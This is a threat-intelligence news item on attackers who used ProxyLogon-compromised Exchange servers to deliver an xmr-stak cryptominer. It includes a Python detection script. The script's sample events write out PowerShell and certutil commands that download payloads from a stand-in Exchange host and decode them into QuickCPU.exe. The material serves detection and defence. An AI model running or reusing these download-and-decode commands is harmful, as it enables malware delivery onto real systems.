Threat Watch

Compromised Exchange Servers Were Used to Host Payloads to Hack Other Exchange Servers

While many threat actors attempted to take advantage of the recent ProxyLogon Exchange vulnerabilities to deploy ransomware, some went in another direction. A Sophos report released Tuesday details an attack where the actors downloaded a cryptominer from other compromised Exchange servers.

PowerShell was used to download files with a .zip extension from the “/owa/auth” directory. These .zip files were actually batch (.bat) scripts that would run certutil.exe to download two more .zip files from the compromised Exchange server. Certutil was also used to base64-decode the content of the files it downloaded, creating two files: QuickCPU.exe and QuickCPU.dat.

QuickCPU.exe is thought to be a modified version of PEx64-Injector, an open-source project designed to inject a 64-bit .exe into a running 64-bit application without administrative privileges. QuickCPU.dat is an archive containing the cryptominer xmr-stak and its configuration file. After xmr-stak and its configuration file are injected into a running system process, the batch script deletes them and QuickCPU.dat from disk.
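As an added illustration (not code from the Sophos or Binary Defense write-ups), the following Python sketch turns the chain above into three process-creation detection rules and runs them over constructed Sysmon-style records; the host name, paths and drop-file names in the samples are assumptions, while -urlcache and -decode are certutil's own download and decode switches, which the write-up does not name.

```python
import re

# Detection rules derived from the chain described above. Each rule is a
# (name, image regex, command-line regex) triple; both regexes must match.
RULES = [
    # certutil.exe used to fetch a file from a URL or to base64-decode one.
    ("certutil_download_or_decode", r"\\certutil\.exe$", r"(?i)-(urlcache|decode)\b"),
    # PowerShell fetching a .zip from the Exchange /owa/auth/ web path.
    ("powershell_owa_auth_zip", r"\\powershell\.exe$", r"(?i)/owa/auth/\S*\.zip"),
    # Any process whose image or arguments name the dropped injector/archive.
    ("quickcpu_artifact", r".*", r"(?i)QuickCPU\.(exe|dat)"),
]

def matches(rule, event):
    """True when both the image and command-line patterns of a rule match."""
    _, image_re, cmd_re = rule
    return (re.search(image_re, event["image"], re.IGNORECASE) is not None
            and re.search(cmd_re, event["cmdline"]) is not None)

def scan(events):
    """Return (event index, rule name) for every rule that fires on each event."""
    hits = []
    for i, ev in enumerate(events):
        for rule in RULES:
            if matches(rule, ev):
                hits.append((i, rule[0]))
    return hits

# Constructed sample process-creation records (Sysmon Event ID 1 style);
# not real telemetry from the incident, host and paths are assumptions.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c iwr https://mail.example.test/owa/auth/x.zip -OutFile x.zip"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\ProgramData\x.bat"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f https://mail.example.test/owa/auth/y.zip y.zip"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -decode y.zip QuickCPU.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},   # benign admin use
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c Get-MailboxDatabase"},        # benign
]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {name} -> {SAMPLE_EVENTS[idx]['cmdline']}")
```

The benign certutil and PowerShell records are included so the rules can be checked for false positives as well as for the expected hits.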

Although the FBI recently took action in the United States to remove web shells from Exchange servers compromised via the ProxyLogon vulnerabilities, other infections on the server may still persist, and the servers were not patched on behalf of the organization. Binary Defense still highly recommends that any organizations that have yet to investigate their on-premises Exchange servers for signs of compromise do so as soon as possible. After ensuring the server is not compromised or has been sufficiently cleaned, patches should be applied using Microsoft’s One-Click Microsoft Exchange On-Premises Mitigation Tool.